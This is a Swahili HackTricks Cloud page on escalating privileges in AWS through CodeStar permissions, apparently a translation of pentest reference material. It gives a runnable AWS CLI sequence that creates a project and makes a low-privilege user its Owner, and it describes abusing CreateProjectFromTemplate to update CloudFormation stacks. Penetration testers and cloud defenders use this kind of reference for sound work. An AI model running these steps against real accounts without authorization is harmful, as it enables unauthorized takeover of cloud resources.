AWS - Codestar Privesc

Jifunze na zoezi la Udukuzi wa AWS:Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoezi la Udukuzi wa GCP: Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Codestar

Unaweza kupata habari zaidi kuhusu codestar katika:

codestar:CreateProject, codestar:AssociateTeamMember

`iam:PassRole`, `codestar:CreateProject`

Kwa idhini hizi unaweza kutumia jukumu la IAM la codestar kufanya vitendo vya kupindukia kupitia template ya cloudformation. Angalia ukurasa ufuatao:

iam:PassRole, codestar:CreateProject

`codestar:CreateProject`, `codestar:AssociateTeamMember`

Mbinu hii inatumia codestar:CreateProject kuunda mradi wa codestar, na codestar:AssociateTeamMember kumfanya mtumiaji wa IAM awe mmiliki wa mradi mpya wa CodeStar, ambao utawapa sera mpya na idhini chache ziada.

PROJECT_NAME="supercodestar"

aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \
--name $PROJECT_NAME \
--id $PROJECT_NAME

echo "Waiting 1min to start the project"
sleep 60

USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"')

aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
--project-id $PROJECT_NAME \
--user-arn "$USER_ARN" \
--project-role "Owner" \
--remote-access-allowed

If you are already a member of the project you can use the permission codestar:UpdateTeamMember to update your role to owner instead of codestar:AssociateTeamMember

Athari Inayowezekana: Privesc kwa sera ya codestar iliyoundwa. Unaweza kupata mfano wa sera hiyo katika:

codestar:CreateProject, codestar:AssociateTeamMember

`codestar:CreateProjectFromTemplate`

Tengeneza Mradi Mpya:

Tumia hatua ya codestar:CreateProjectFromTemplate kuanzisha uundaji wa mradi mpya.
Baada ya uundaji mafanikio, ufikiaji unatolewa moja kwa moja kwa cloudformation:UpdateStack.
Ufikiaji huu unalenga hasa stakli inayohusiana na jukumu la IAM CodeStarWorker-<jina la mradi la kawaida>-CloudFormation.

Sasisha Stakli ya Lengo:

Kwa ruhusa zilizotolewa za CloudFormation, endelea kusasisha stakli iliyotajwa.
Jina la stakli kawaida litafuata mojawapo ya mifano miwili:
awscodestar-<jina la mradi la kawaida>-miundombinu
awscodestar-<jina la mradi la kawaida>-lambda
Jina kamili linategemea templeti iliyochaguliwa (kurejelea skripti ya kudanganya mfano).

Ufikiaji na Ruhusa:

Baada ya kusasisha, unapata uwezo uliopewa jukumu la IAM la CloudFormation linalohusishwa na stakli.
Kumbuka: Hii haipati moja kwa moja ruhusa kamili za msimamizi. Rasilimali zilizopangwa vibaya zaidi ndani ya mazingira zinaweza kuhitajika kuinua ruhusa zaidi.

Kwa habari zaidi angalia utafiti wa asili: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. Unaweza kupata udanganyifu huo katika https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py

Athari Inayowezekana: Privesc kwa jukumu la IAM la cloudformation.

Jifunze & zoezi Udukuzi wa AWS:Mafunzo ya HackTricks AWS Red Team Expert (ARTE) Jifunze & zoezi Udukuzi wa GCP: Mafunzo ya HackTricks GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousAWS - Codepipeline Privesc Nextcodestar:CreateProject, codestar:AssociateTeamMember

Last updated 1 month ago